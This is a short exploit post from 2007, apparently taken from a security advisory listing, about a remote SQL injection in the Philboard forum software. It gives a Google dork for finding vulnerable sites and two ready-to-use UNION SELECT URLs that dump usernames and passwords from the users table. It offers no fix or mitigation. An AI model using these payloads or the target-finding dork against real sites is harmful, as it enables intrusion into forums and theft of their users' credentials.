Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion

KvGuestbook Remote Add Admin Exploit

MediaWiki Full Path Disclosure Vulnerability

phpPolls 1.0.3 (acces to sensitive file)

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	12.02.2007
Subject:	Philboard (id) Remote SQL Injection

----------------------------------------------------

Philboard (id) Remote SQL Injection

----------------------------------------------------

Bulan: xoron

xoron.info - xoron.biz

Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp"

----------------------------------------------------

Exploit: philboard_forum.asp?forumid=[SQL]

----------------------------------------------------

Example:

Username
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,
12,13,14,15,16,17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,
12,13,14,15,16,17,18+from+users

----------------------------------------------------

Forum: username + password

----------------------------------------------------

Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" .

----------------------------------------------------